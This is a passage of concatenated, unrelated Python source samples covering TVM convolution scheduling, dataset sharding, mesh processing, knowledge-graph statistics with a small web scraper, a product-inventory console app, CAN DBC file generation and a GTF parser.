te.sum(data_vec[n, h, w, ci, vh + kh, vw + kw].astype(out_dtype) *
kernel_vec[co, ci, KH - 1 - kh, KW - 1 - kw, vc].astype(out_dtype),
axis=[ci, kh, kw]), name='conv')
idxdiv = tvm.tir.indexdiv
idxmod = tvm.tir.indexmod
output = te.compute(oshape, lambda n, co, h, w:
conv[n,
idxdiv(co, VC), idxdiv(h, VH), idxdiv(w, VW),
idxmod(h, VH), idxmod(w, VW), idxmod(co, VC)],
name='output_unpack', tag='spatial_conv2d_transpose_output')
return output
# register customized schedule for arm cpu.
@autotvm.register_topi_schedule("conv2d_transpose_nchw.arm_cpu")
def schedule_conv2d_transpose_nchw(cfg, outs):
"""Schedule conv2d transpose for arm cpu"""
s = te.create_schedule([x.op for x in outs])
def _callback(op):
if 'spatial_conv2d_transpose_output' in op.tag:
output = op.output(0)
conv = op.input_tensors[0]
data_vec = conv.op.input_tensors[0]
data_pad = data_vec.op.input_tensors[0]
dilated_input = data_pad.op.input_tensors[0]
s[data_pad].compute_inline()
s[dilated_input].compute_inline()
kernel_vec = conv.op.input_tensors[1]
if kernel_vec.op.name == 'kernel_vec':
kernel = kernel_vec.op.input_tensors[0]
else:
kernel = kernel_vec
if isinstance(kernel.op, tvm.te.ComputeOp) and "dilate" in kernel.op.tag:
s[kernel].compute_inline()
schedule_conv2d_spatial_pack_nchw(cfg, s, data_vec, kernel_vec,
conv, output, outs[0])
traverse_inline(s, outs[0].op, _callback)
return s
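
# Quick sanity sketch of the output-size arithmetic used in _decl_spatial_pack
# above (plain Python, no TVM dependency; the helper name is illustrative only):
def _expected_transpose_out_hw(in_hw, kernel_hw, strides, pads, output_padding):
    """OH = (IH - 1) * stride - pad_top - pad_bottom + KH + opad_h (same for width)."""
    (ih, iw), (kh, kw) = in_hw, kernel_hw
    (sh, sw), (opad_h, opad_w) = strides, output_padding
    pad_top, pad_left, pad_bottom, pad_right = pads
    oh = (ih - 1) * sh - pad_top - pad_bottom + kh + opad_h
    ow = (iw - 1) * sw - pad_left - pad_right + kw + opad_w
    return oh, ow

# e.g. a 4x4 input, 3x3 kernel, stride 2, no padding -> (9, 9)
# _expected_transpose_out_hw((4, 4), (3, 3), (2, 2), (0, 0, 0, 0), (0, 0))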

# ===== StarcoderdataPython sample 1629777 =====
import subprocess
import omegaconf
from hydra.utils import instantiate
from pathlib import Path
def _load_dataset(
data_files,
extension="json",
test_split_percentage=10,
min_tokens=5,
download_mode="reuse_dataset_if_exists",
num_proc=1,
):
from datasets import load_dataset
dataset = {}
if test_split_percentage > 0:
dataset["test"] = load_dataset(
extension,
data_files=data_files,
split=f"train[:{test_split_percentage}%]",
download_mode=download_mode,
)
dataset["train"] = load_dataset(
extension,
data_files=data_files,
split=f"train[{test_split_percentage}%:]",
)
else:
dataset = load_dataset(
extension, data_files=data_files, download_mode=download_mode
)
for name in dataset:
n_proc = min(num_proc, len(dataset[name]) - 1)
cols = dataset[name].column_names
cols.remove("text")
if len(cols) > 0:
dataset[name] = dataset[name].remove_columns(cols)
dataset[name] = dataset[name].filter(
lambda x: len(x["text"].split()) > min_tokens, num_proc=n_proc
)
# print(dataset[name]['text'][0])
print(
"Loading Datasets: There are",
len(dataset[name]),
f"records in {name} dataset.",
data_files,
)
return dataset
class ShardingDataset:
def __init__(
self, corpus, output, dataset, n_shards, n_processes, segmenter, **args
):
self.input_extension = corpus["corpus_filetype"]
corpus_files = corpus["corpus_files"]
corpus_dir = corpus["corpus_dir"]
if corpus_files:
print(type(corpus_files))
if isinstance(corpus_files, str):
corpus_files = {corpus_files: 1}
elif (
isinstance(corpus_files, list)
or type(corpus_files) == omegaconf.listconfig.ListConfig
):
corpus_files = {f: 1 for f in corpus_files}
else:
corpus_files = dict(corpus_files)
corpus_files = {corpus_dir + "/" + f: d for f, d in corpus_files.items()}
else:
corpus_files = {
str(f): 1 for f in Path(corpus_dir).glob("**/*") if f.is_file()
}
assert (
len(corpus_files) > 0
), "The input file list must contain at least one file."
self.input_files = corpus_files
assert n_shards["train"] > 0, "There must be at least one output shard."
# assert n_test_shards > 0, 'There must be at least one output shard.'
self.n_shards = n_shards
self.download_mode = dataset["download_mode"]
self.fraction_test_set = dataset["fraction_test_set"]
if not self.fraction_test_set > 0:
self.n_shards["test"] = 0
self.shuffle_dataset = dataset["shuffle_dataset"]
self.seed = dataset["seed"]
self.min_tokens = dataset["min_tokens"]
if n_processes:
self.n_processes = n_processes
else:
self.n_processes = 7
self.segmenter = segmenter
self.output_dir = Path(output["output_dir"])
if not self.output_dir.is_dir():
self.output_dir.mkdir(parents=True, exist_ok=True)
self.output_name_prefix = output["name_prefix"]
self.output_identifier = output["identifier"]
self.output_file_extension = output["file_extension"]
self.datasets = {} # key: split name, value: dataset
self.output_files = {
"train": {},
"test": {},
} # key: filename, value: list of articles to go into file
self.init_output_files()
# Remember, the input files contain one article per line (the whitespace check is to skip extraneous blank lines)
def load_datasets(self):
from datasets import concatenate_datasets
print("Start: Loading Datasets")
datasets = {"train": [], "test": []}
for input_file, dupe_factor in self.input_files.items():
print(f"processing {input_file} with {dupe_factor} dupe factor")
dset = _load_dataset(
input_file,
extension=self.input_extension,
test_split_percentage=int(self.fraction_test_set * 100),
min_tokens=self.min_tokens,
download_mode=self.download_mode,
num_proc=self.n_processes,
)
# self.datasets[input_file] = dset
for name in dset:
for i in range(dupe_factor):
datasets[name].append(dset[name])
print(f"{i}: adding {len(dset[name])} records in {name} dataset.")
for name in datasets:
if len(datasets[name]) > 0:
self.datasets[name] = concatenate_datasets(datasets[name])
print(f"Concatenating {len(datasets[name])} {name} datasets.")
if self.shuffle_dataset:
for name in self.datasets:
print(f"Shuffling {name} dataset.")
self.datasets[name] = self.datasets[name].shuffle(self.seed)
print("End: Loading Datasets.")
def segment_articles_into_sentences(self):
if not self.datasets:
self.load_datasets()  # the class defines load_datasets(), not load_articles()
assert (
len(self.datasets["train"]) > 0
), "Please check that input files are present and contain data."
assert self.segmenter[
"_target_"
], "Please check that the segmenter is configured correctly."
print("Start: Sentence Segmentation")
seg = instantiate(self.segmenter)
def segment_into_sentences(examples):
sentences = []
for text in examples["text"]:
sentences += seg.segment_article(text.replace("\t", " "))
sentences.append("")
return {"text": sentences}
num_articles = 0
num_sentences = 0
for name in self.datasets:
num_articles += len(self.datasets[name])
num_proc = min(self.n_processes, len(self.datasets[name]) - 1)
self.datasets[name] = self.datasets[name].map(
segment_into_sentences, batched=True, num_proc=num_proc
)
num_sentences += len(self.datasets[name])
print(
f"Number of articles: {num_articles}, Number of sentences: {num_sentences}"
)
print("End: Sentence Segmentation")
def init_output_files(self):
print("Start: Init Output Files")
for name in self.output_files:
assert (
len(self.output_files[name]) == 0
), "Internal storage self.output_files already contains data."
for i in range(self.n_shards[name]):
filename = (
self.output_name_prefix
+ self.output_identifier[name]
+ "_"
+ str(i)
+ self.output_file_extension
)
self.output_files[name][filename] = None
print("End: Init Output Files")
def distribute_datasets_over_shards(self):
print("Start: Distribute Datasets Over Shards")
for name in self.datasets:
assert (
len(self.datasets[name]) > self.n_shards[name]
), "There are fewer articles than shards. Please add more data or reduce the number of shards requested."
for i, filename in enumerate(self.output_files[name]):
self.output_files[name][filename] = self.datasets[name].shard(
self.n_shards[name], i, contiguous=True
)
for shard in self.output_files[name]:
print(f"{name} shard:", shard, len(self.output_files[name][shard]))
print("End: Distribute Datasets Over Shards")
def write_shards_to_disk(self):
print("Start: Write Shards to Disk")
for name in self.output_files:
for shard in self.output_files[name]:
self.write_single_shard(shard, self.output_files[name][shard])
print("End: Write Shards to Disk")
for split, n in self.n_shards.items():
if n > 0:
if not (self.output_dir / split).is_dir():
(self.output_dir / split).mkdir(exist_ok=True, parents=True)
absolute_dir = str(self.output_dir)
command = (
"mv "
+ absolute_dir
+ "/*"
+ split
+ "*.txt"
+ " "
+ absolute_dir
+ "/"
+ split
)
print(command)
mv_process = subprocess.Popen(command, shell=True)
mv_process.wait()
def write_single_shard(self, shard_name, shard_dataset):
with open(shard_name, mode="w", newline="\n") as f:
for text in shard_dataset["text"]:
f.write(text + "\n")

# ===== StarcoderdataPython sample 3363953 =====
import json
import pytest
from guillotina_volto.behaviors.syndication import ISyndicationSettings
pytestmark = pytest.mark.asyncio
async def test_behaviors(cms_requester):
    async with cms_requester as requester:
        resp, status = await requester(
            "POST",
            "/db/guillotina",
            data=json.dumps({"id": "doc1", "@type": "Document"}),
        )
        resp, status = await requester("GET", "/db/guillotina/doc1/@behaviors")
        assert status == 200
        result = resp[ISyndicationSettings.__identifier__]["properties"]
        assert "vocabulary" in result["sort_on"]  # noqa

# ===== StarcoderdataPython sample 1621746 =====
import os
import re
import numpy as np
import trimesh
def save_mesh(mesh, save_path):
if isinstance(mesh.visual, trimesh.visual.texture.TextureVisuals):
save_path = os.path.join(os.path.dirname(save_path),
os.path.basename(os.path.splitext(save_path)[0]),
os.path.basename(save_path))
os.makedirs(os.path.dirname(save_path), exist_ok=True)
trimesh.exchange.export.export_mesh(mesh, save_path)
def load_mesh(path, mesh_only=False):
mesh = trimesh.load_mesh(path)
if mesh_only:
mesh = trimesh.Trimesh(vertices=mesh.vertices, faces=mesh.faces)
return mesh
class MeshExtractor:
def extract_mesh(self, *args, **kwargs):
raise NotImplementedError
class MeshIO(dict):
def __init__(self, meshes=None):
if meshes is None:
meshes = {}
self.mesh_path = {}
super().__init__(meshes)
@classmethod
def from_file(cls, key_path_pair: (dict, list)):
mesh_io = cls()
if isinstance(key_path_pair, list):
key_path_pair = {i: p for i, p in enumerate(key_path_pair)}
mesh_io.mesh_path = key_path_pair
return mesh_io
def __getitem__(self, item):
if item not in super().keys():
mesh = load_mesh(self.mesh_path[item], mesh_only=True)
super().__setitem__(item, mesh)
return super().__getitem__(item)
def load(self):
for k in self.mesh_path.keys():
self.__getitem__(k)
return self
def merge(self):
return sum([m for m in self.values()]) if self else trimesh.Trimesh()
def save(self, folder):
os.makedirs(folder, exist_ok=True)
for k, v in self.items():
save_mesh(v, os.path.join(folder, f"{k}.obj"))
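# Usage sketch for MeshIO (file paths are hypothetical):
#
#   mesh_io = MeshIO.from_file(["chair.obj", "table.obj"])   # lazy, nothing loaded yet
#   merged = mesh_io.load().merge()                          # load every mesh and sum them
#   mesh_io.save("out_meshes")                               # writes out_meshes/0.obj, out_meshes/1.obj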
#cross product of vectors a and b
def cross(a, b):
x = a[1] * b[2] - a[2] * b[1]
y = a[2] * b[0] - a[0] * b[2]
z = a[0] * b[1] - a[1] * b[0]
return (x, y, z)
# determinant of matrix a
def det(a):
return a[0][0]*a[1][1]*a[2][2] + a[0][1]*a[1][2]*a[2][0] + a[0][2]*a[1][0]*a[2][1] - a[0][2]*a[1][1]*a[2][0] - a[0][1]*a[1][0]*a[2][2] - a[0][0]*a[1][2]*a[2][1]
# unit normal vector of plane defined by points a, b, and c
def unit_normal(a, b, c):
x = det([[1,a[1],a[2]],
[1,b[1],b[2]],
[1,c[1],c[2]]])
y = det([[a[0],1,a[2]],
[b[0],1,b[2]],
[c[0],1,c[2]]])
z = det([[a[0],a[1],1],
[b[0],b[1],1],
[c[0],c[1],1]])
magnitude = (x**2 + y**2 + z**2)**.5
if magnitude == 0.:
return (0., 0., 0.)
else:
return (x/magnitude, y/magnitude, z/magnitude)
#dot product of vectors a and b
def dot(a, b):
return a[0]*b[0] + a[1]*b[1] + a[2]*b[2]
#area of polygon poly
def get_area(poly):
if len(poly) < 3: # not a plane - no area
return 0
total = [0, 0, 0]
for i in range(len(poly)):
vi1 = poly[i]
if i is len(poly)-1:
vi2 = poly[0]
else:
vi2 = poly[i+1]
prod = cross(vi1, vi2)
total[0] += prod[0]
total[1] += prod[1]
total[2] += prod[2]
result = dot(total, unit_normal(poly[0], poly[1], poly[2]))
return abs(result/2)
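# Worked example: the unit square in the XY plane has area 1.
#
#   get_area([(0, 0, 0), (1, 0, 0), (1, 1, 0), (0, 1, 0)])   # -> 1.0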
def calculate_face_area(data):
face_areas = []
for face in data['f']:
vid_in_face = [int(item.split('/')[0]) for item in face]
face_area = get_area(data['v'][np.array(vid_in_face) - 1,:3].tolist())
face_areas.append(face_area)
return face_areas
def sample_pnts_from_obj(data, n_pnts = 5000, mode = 'uniform'):
# sample points on each object mesh.
flags = data.keys()
all_pnts = data['v'][:,:3]
area_list = np.array(calculate_face_area(data))
distribution = area_list/np.sum(area_list)
# sample points the probability depends on the face area
new_pnts = []
if mode == 'random':
random_face_ids = np.random.choice(len(data['f']), n_pnts, replace=True, p=distribution)
random_face_ids, sample_counts = np.unique(random_face_ids, return_counts=True)
for face_id, sample_count in zip(random_face_ids, sample_counts):
face = data['f'][face_id]
vid_in_face = [int(item.split('/')[0]) for item in face]
weights = np.diff(np.sort(np.vstack(
[np.zeros((1, sample_count)), np.random.uniform(0, 1, size=(len(vid_in_face) - 1, sample_count)),
np.ones((1, sample_count))]), axis=0), axis=0)
new_pnt = all_pnts[np.array(vid_in_face) - 1].T.dot(weights)
if 'vn' in flags:
nid_in_face = [int(item.split('/')[2]) for item in face]
new_normal = data['vn'][np.array(nid_in_face)-1].T.dot(weights)
new_pnt = np.hstack([new_pnt, new_normal])
new_pnts.append(new_pnt.T)
random_pnts = np.vstack(new_pnts)
else:
for face_idx, face in enumerate(data['f']):
vid_in_face = [int(item.split('/')[0]) for item in face]
n_pnts_on_face = distribution[face_idx] * n_pnts
if n_pnts_on_face < 1:
continue
dim = len(vid_in_face)
npnts_dim = (np.math.factorial(dim - 1)*n_pnts_on_face)**(1/(dim-1))
npnts_dim = int(npnts_dim)
weights = np.stack(np.meshgrid(*[np.linspace(0, 1, npnts_dim) for _ in range(dim - 1)]), 0)
weights = weights.reshape(dim - 1, -1)
last_column = 1 - weights.sum(0)
weights = np.vstack([weights, last_column])
weights = weights[:, last_column >= 0]
new_pnt = (all_pnts[np.array(vid_in_face) - 1].T.dot(weights)).T
if 'vn' in flags:
nid_in_face = [int(item.split('/')[2]) for item in face]
new_normal = data['vn'][np.array(nid_in_face) - 1].T.dot(weights)
new_pnt = np.hstack([new_pnt, new_normal])
new_pnts.append(new_pnt)
random_pnts = np.vstack(new_pnts)
return random_pnts
def normalize_to_unit_square(points, keep_ratio=True):
centre = (points.max(0) + points.min(0)) / 2.
point_shapenet = points - centre
if keep_ratio:
scale = point_shapenet.max()
else:
scale = point_shapenet.max(0)
point_shapenet = point_shapenet / scale
return point_shapenet, centre, scale
def read_obj(model_path, flags=('v')):
fid = open(model_path, 'r')
data = {}
for head in flags:
data[head] = []
for line in fid:
# line = line.strip().split(' ')
line = re.split('\s+', line.strip())
if line[0] in flags:
data[line[0]].append(line[1:])
fid.close()
if 'v' in data.keys():
data['v'] = np.array(data['v']).astype(np.float)
if 'vt' in data.keys():
data['vt'] = np.array(data['vt']).astype(np.float)
if 'vn' in data.keys():
data['vn'] = np.array(data['vn']).astype(np.float)
return data
def write_obj(objfile, data):
with open(objfile, 'w+') as file:
for item in data['v']:
file.write('v' + ' %f' * len(item) % tuple(item) + '\n')
for item in data['f']:
file.write('f' + ' %s' * len(item) % tuple(item) + '\n')
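
# End-to-end sketch (the path 'model.obj' is hypothetical; faces are needed for
# sampling, so request both 'v' and 'f' when reading):
#
#   data = read_obj("model.obj", flags=("v", "f"))
#   pnts = sample_pnts_from_obj(data, n_pnts=2000, mode="random")
#   pnts_unit, centre, scale = normalize_to_unit_square(pnts)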

# ===== StarcoderdataPython sample 3376763 =====
import os
def static():
path = './train2id.txt'
head_dic = {}
tail_dic = {}
cnt = 0
with open(path, 'r') as f:
for raw in f.readlines():
raw = raw.strip().split(' ')
try:
head, tail, r = raw
if head not in head_dic.keys():
head_dic[head] = 1
else:
head_dic[head] = head_dic[head] + 1
if tail not in tail_dic.keys():
tail_dic[tail] = 1
else:
tail_dic[tail] = tail_dic[tail] + 1
except:
cnt = cnt + 1
continue
head_cnt = 0
head_mean = 0
tail_cnt = 0
tail_mean = 0
for key in head_dic.keys():
head_cnt = head_cnt + head_dic[key]
for key in tail_dic.keys():
tail_cnt = tail_cnt + tail_dic[key]
head_mean = head_cnt / len(head_dic.keys())
tail_mean = tail_cnt / len(tail_dic.keys())
print(len(head_dic.keys()))
print(head_mean)
print(len(tail_dic.keys()))
print(tail_mean)
def url2name(number):
with open('./entity2id.txt', 'r') as f:
lines = f.readlines()
for line in lines[1:]:
a, b = line.strip().split(' ')
if int(b) == number:
str = a
print(str)
break
url_path = './fb2w.nt'
# f_write = open('./entity2id.txt', 'w')
print(str)
with open(url_path, 'r') as f:
for line in f.readlines():
line = line.strip().split(' ')
if len(line) == 3:
line.pop(1)
m, url = line
m = '/' + m.split('/')[-1].replace('>', '').replace('.', '/')
url = url[1:-3]
if m == str:
print('\t'.join([m, url]))
break
def pachong(url):
from lxml import etree
import requests
import urllib.parse
import urllib3
from bs4 import BeautifulSoup
import re
import random
import time
import xlwt
requesHeader = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Host': 'www.guidelines-registry.org',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Referer': 'http://www.guidelines-registry.org/guid?lang=zh_CN&page=2&limit=10',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'
}
requesHeader1 = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Cookie': 'SESSION=NzBkZjlhMmYtYjEyNS00NDUyLTg1ZDktOTlkZDYxYTYyMTVi',
'Host': 'www.guidelines-registry.org',
'Referer': 'http://www.guidelines-registry.org/guid?lang=zh_CN',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'
}
http = urllib3.PoolManager(num_pools=10, headers=requesHeader1)
workbook = xlwt.Workbook(encoding='utf-8')
sheet = workbook.add_sheet('Sheet1')
resp2 = http.request('GET', url)
print(resp2.data)
soup2 = BeautifulSoup(resp2.data, "html.parser")
print(soup2)
if __name__ == "__main__":
# static() # summarise dataset statistics
# 5438 69 30 (tootsie, BAFTA Award for Best Makeup and Hair, award)
# 268 5438 32(<NAME>., toorsie, film)
# 268 4427 32
# 268 618 32
# 268 7480 32
# 268 1504 32
# 10747 268 8
# 268 2973 32
# 268 7261 32
# 6651 637 13 (<NAME>, France, film location)
# 6651 293 13
# 6651 816 13 (,danmai,)
# 6651 68 13
# 3494 6651 6 (<NAME>, <NAME>, starred in)
# 6651 3028 13
# 6651 1960 26 (, sound editor, film crew role)
# 6571 1155 8 (Brenda Strong, Alfre Woodard, award)
# 1155 6571 3 (Alfre Woodard, Brenda Strong, won)
# 2346 6571 8 (<NAME>, Brenda Strong, award)
# 6571 2346 8 (Brenda Strong, Brenda Strong, award)
# 3023 6571 8 <NAME>
# 6571 7554 6 (Brenda Strong, Starship Troopers (movie), played)
# 7554 1098 26 (Starship Troopers(movie), )
# 8605 2974 84 Priest, <NAME>, produce by
# 291 2974 136 <NAME>: The Spy Who Shagged Me, <NAME>, executive_produced_by
# 9022 2974 136 The Mask, <NAME>, executive_produced_by
# 9022 136 31 The Mask,action film, /film/film/genre
# 3504 9022 6 <NAME>, The Mask, played
# 9022 1885 90 The Mask, streaming media, film distribution medium
# 69 9022 7 BAFTA Award for Best Makeup and Hair, The Mask, nominated for
# 1224 7261 102 <NAME>, Rush Hour
# 2181 660 102 <NAME>, Grindhouse
# 8883 9143 102 <NAME>, Coming to America
# 7557 3822 102 <NAME>, Willow
# 4204 7539 102
# 8531 5744 102
# 5121 3066 102
# 2561 11402 102 <NAME>, Blade Runner
# 2561 3508 102 <NAME>, Legend
# 1239 761 102
# 5510 1003 102
# 8647 4583 102
# 1917 2460 102 <NAME>, 1941 1-n
# 1917 3950 102 Schindler's List
# 1917 4282 102 <NAME>, <NAME> and the Kingdom of the Crystal Skull
# 1917 928 159 <NAME>, Universal Pictures, employer company n-1
# 879 1917 71 Jewish people, <NAME>, ethnicity 1-n
# 1127 1917 47 Academy Award for Best Director, <NAME>, award_winner n-n
# 1420 1917 45 <NAME>, <NAME>, friendship n-n
# 1420 141 43
# 1420 12777 224 Fayetteville, location of ceremony n-1
# 1420 44 82 Christianity, religion n-1
# 1420 4489 236 Arkansas, jurisdiction of office n-1
# 1420 236 179 president, government position held n-n
#
# 5243 1917 47
# 1917 3950 38
# 1917 4272 38
# 1917 1420 45
# 1917 1127 19
# 1846 1917 47 <NAME> Award
# 1917 1846 19
# 5328 1371 192 <NAME>
# 13858 13158 192 <NAME> <NAME>
# 262 2454 192 <NAME> <NAME>
# 3888 12165 192 <NAME> <NAME>
ll = [1917, 2460, 3950, 4282]
if True:
number = 12165
url2name(number)
else:
for number in ll:
url2name(number)

# ===== StarcoderdataPython sample 101952 (0 stars) =====
import pickle
import numpy as np
import csv
infile=open('./labels.dat','rb')
labels=pickle.load(infile)
labels = labels.tolist()
infile = open('../Trapnell_TCC.dat', 'rb')
load = pickle.load(infile)
print('converting to list')
df = load.toarray()
f = open('./TCC.txt', 'w')
writer = csv.writer(f)
for row in df:
    print(row)
    writer.writerow(row)

# ===== StarcoderdataPython sample 146119 (file: 1-mouth01/project_month01/exe01.py, 1-10 stars) =====
class CommodityModel:
def __init__(self, cid=0, name="", price=0, cm=0):
self.cid = cid
self.name = name
self.price = price
self.cm = cm
def __str__(self):
return f"Product name: {self.name}, id: {self.cid}, price: {self.price}, code: {self.cm}"
def __eq__(self, other):
return self.cm == other.cm
class CommodityView:
def __init__(self):
self.__controller = CommodityController()
def __display_veiw_menu(self):
print("Press 1 to enter product info")
print("Press 2 to display product info")
print("Press 3 to delete product info")
print("Press 4 to update product info")
def __select_menu(self):
giao = int(input("Please enter a key: "))
if giao == 1:
self.__input_commodity_info()
elif giao == 2:
self.__display_commodity_info()
elif giao == 3:
self.__remove_commodity_info()
elif giao == 4:
self.__update_commodity_info()
def __input_commodity_info(self):
ccm = CommodityModel()
ccm.name = input("Please enter the product name: ")
ccm.price = int(input("Please enter the product price: "))
ccm.cid = int(input("Please enter the product id: "))
self.__controller.addto_datebase_of_Commodityinfo(ccm)
print("Success!!!")
def main(self):
while 1:
self.__display_veiw_menu()
self.__select_menu()
def __display_commodity_info(self):
for i in self.__controller.list_of_commodity:
print(i)
def __remove_commodity_info(self):
cm = int(input("Please enter the code of the product to delete: "))
if self.__controller.removed_info(cm):
print("Deleted successfully")
else:
print("Delete failed")
def __update_commodity_info(self):
ccm = CommodityModel()
ccm.cm = int(input("Please enter the code of the product to update: "))
ccm.cid = input("Please enter the product id: ")
ccm.name = input("Please enter the product name: ")
ccm.price = input("Please enter the product price: ")
if self.__controller.update_info(ccm):
print("Updated successfully")
else:
print("Update failed")
class CommodityController:
def __init__(self):
self.__list_of_commodity = []
self.number_of_cm = 1000
@property
def list_of_commodity(self):
return self.__list_of_commodity
def addto_datebase_of_Commodityinfo(self, comdity_info):
comdity_info.cm = self.number_of_cm
self.number_of_cm += 1
self.__list_of_commodity.append(comdity_info)
def removed_info(self, cm):
cm1 = CommodityModel(cm=cm)
if cm1 in self.__list_of_commodity:
self.__list_of_commodity.remove(cm1)
return True
else:
return False
def update_info(self, ccm):
for i in self.__list_of_commodity:
if i.cm == ccm.cm:
i.__dict__ = ccm.__dict__
return True
return False
v = CommodityView()
v.main()

# ===== StarcoderdataPython sample 4817414 =====
from dataclasses import asdict
from packet import Packet
class DBC:
# if provided filepath, load DBC tree structure from path
def __init__(self, filepath=None, packets=None, ecu_packets=None):
if packets is not None:
self.packets = packets
self.bus_ids = set()
self.ecu_packets = ecu_packets
for packet in packets:
self.bus_ids.add(packet.bus_id)
return
self.packets = [] # packet list
self.bus_ids = set()
if filepath is not None:
pass
@classmethod
def from_packets_list(cls, packets_data: list, ecu_packets: str) -> "DBC":
packets = []
for data in packets_data:
packet = Packet.from_dict(data)
packets.append(packet)
return cls(packets=packets, ecu_packets=ecu_packets)
def to_dict(self):
data = {"packet": []}
for packet in self.packets:
data["packet"].append(asdict(packet))
return {"file": [data]}
def add_packet(self, packet):
"""
Add packet to dbc
"""
self.bus_ids.add(packet.bus_id)
self.packets.append(packet)  # packets is a list, so append (set-style .add would raise AttributeError)
def is_valid(self):
"""
Determine if this is a valid dbc
"""
pass # we don't have invalid dbcs. duh
def __repr__(self):
"""
Custom string representation
"""
packet_strs = []
for packet in self.packets:
packet_strs.append(str(packet))
return """VERSION ""
NS_ :
NS_DESC_
CM_
BA_DEF_
BA_
VAL_
CAT_DEF_
CAT_
FILTER
BA_DEF_DEF_
EV_DATA_
ENVVAR_DATA_
SGTYPE_
SGTYPE_VAL_
BA_DEF_SGTYPE_
BA_SGTYPE_
SIG_TYPE_REF_
VAL_TABLE_
SIG_GROUP_
SIG_VALTYPE_
SIGTYPE_VALTYPE_
BO_TX_BU_
BA_DEF_REL_
BA_REL_
BA_DEF_DEF_REL_
BU_SG_REL_
BU_EV_REL_
BU_BO_REL_
SG_MUL_VAL_
BS_:
BU_: {bus_ids}
{packets}
{ecu_packets}
BA_DEF_ BU_ "TpNodeBaseAddress" HEX 0 65535;
BA_DEF_ BO_ "GenMsgSendType" STRING ;
BA_DEF_ "ProtocolType" STRING ;
BA_DEF_ "NmType" STRING ;
BA_DEF_ BO_ "GenMsgCycleTime" INT 1 10000;
BA_DEF_ BO_ "GenMsgILSupport" ENUM "No","Yes";
BA_DEF_ BU_ "ILUsed" ENUM "No","Yes";
BA_DEF_ "VersionNumber" INT 0 10000;
BA_DEF_ "VersionDay" INT 1 31;
BA_DEF_ "VersionMonth" INT 1 12;
BA_DEF_ "VersionYear" INT 2016 3000;
BA_DEF_ "BusType" STRING ;
BA_DEF_ BO_ "DBC_Author_Contact" STRING ;
BA_DEF_DEF_ "DBC_Author_Contact" "<EMAIL>";
BA_DEF_DEF_ "TpNodeBaseAddress" 0;
BA_DEF_DEF_ "GenMsgSendType" "Cyclic";
BA_DEF_DEF_ "ProtocolType" "";
BA_DEF_DEF_ "NmType" "";
BA_DEF_DEF_ "GenMsgCycleTime" 20;
BA_DEF_DEF_ "GenMsgILSupport" "Yes";
BA_DEF_DEF_ "ILUsed" "Yes";
BA_DEF_DEF_ "VersionNumber" 0;
BA_DEF_DEF_ "VersionDay" 1;
BA_DEF_DEF_ "VersionMonth" 1;
BA_DEF_DEF_ "VersionYear" 2016;
BA_DEF_DEF_ "BusType" "Can";
BA_ "ProtocolType" "AEM Net";
BA_ "NmType" "AEM Net";
BA_ "VersionNumber" 3;
BA_ "VersionDay" 28;
BA_ "VersionMonth" 11;
BA_ "BusType" "CAN";
BA_ "GenMsgCycleTime" BO_ 2180030470 50;
BA_ "GenMsgCycleTime" BO_ 2180030466 16;
BA_ "GenMsgCycleTime" BO_ 2180030465 16;
BA_ "GenMsgCycleTime" BO_ 2180030464 16;
""".format(
bus_ids=" ".join(self.bus_ids), packets="\n\n".join(packet_strs), ecu_packets=self.ecu_packets
)

# ===== StarcoderdataPython sample 3201807 (repo: ncrnalab/ribofy) =====
"""
Module for handling gtf files
"""
import sys
from collections import defaultdict
import time
import mmap
rids = ["gene_id", "transcript_id", "gene_name"]
class gtf2_info (object):
def __init__ (self, gtf2, pos, feature):
self.positions = pos
self.gtf2 = gtf2
self.feature = feature
#self.fetch = fetch
def get_info (self):
nlines = 0
with open(self.gtf2.gtf_file) as fgtf:
for id in self.positions:
for pos in self.positions[id]:
fgtf.seek (int(pos))
columns = fgtf.readline().strip().split ("\t")
chrom, feature, start, end, strand, info = columns[0], columns[2], columns[3], columns[4], columns[6], columns[8]
if feature == self.feature:
nlines += 1
yield {"id": id, "chrom":chrom, "start":int(start), "end":int(end), "strand":strand, "info":info}
#if nlines == 0:
# yield {"id": "N/A", "chrom": "N/A", "start":-1, "end":-1, "strand":"N/A", "info":"N/A"}
def get_start (self):
return (min ([info["start"] for info in self.get_info ()]))
def get_end (self):
return (max ([info["end"] for info in self.get_info ()]))
def get_coordinates (self):
start = self.get_start ()
end = self.get_end ()
chrom = ",".join (list (set ([info["chrom"] for info in self.get_info ()])))
strand = ",".join (list (set ([info["strand"] for info in self.get_info ()])))
return {"chrom":chrom, "start":start, "end":end, "strand":strand}
def get_exons (self):
exons_s = [info["start"] for info in self.get_info ()]
exons_e = [info["end"] for info in self.get_info ()]
exons_s.sort()
exons_e.sort()
return (exons_s, exons_e)
def get_introns (self):
exons_s, exons_e = self.get_exons ()
introns_s = [exons_e[i] for i in range (len (exons_s)-1)]
introns_e = [exons_s[i+1] for i in range (len (exons_s)-1)]
return (introns_s, introns_e)
def get_length (self):
return len([info for info in self.get_info ()])
def print_feature (self, feature):
for info in self.get_info ():
self.print_info (info, feature)
def print_info (self, info, feature):
print ("\t".join ([info['chrom'], "gtf2", feature, str (info['start']), str(info['end']), ".", info['strand'], ".", info['info']]))
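# Usage sketch (the file name and transcript id are hypothetical):
#
#   gtf = gtf2("annotation.gtf", verbose=1)
#   tx = gtf.fetch("ENST00000456328", feature="exon")
#   print(tx.get_coordinates())   # {'chrom': ..., 'start': ..., 'end': ..., 'strand': ...}
#   exons_s, exons_e = tx.get_exons()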
class gtf2 (object):
def __init__ (self, gtf_file, head = -1, verbose = 0):
self.verbose = verbose
self.nexon_lines = 0
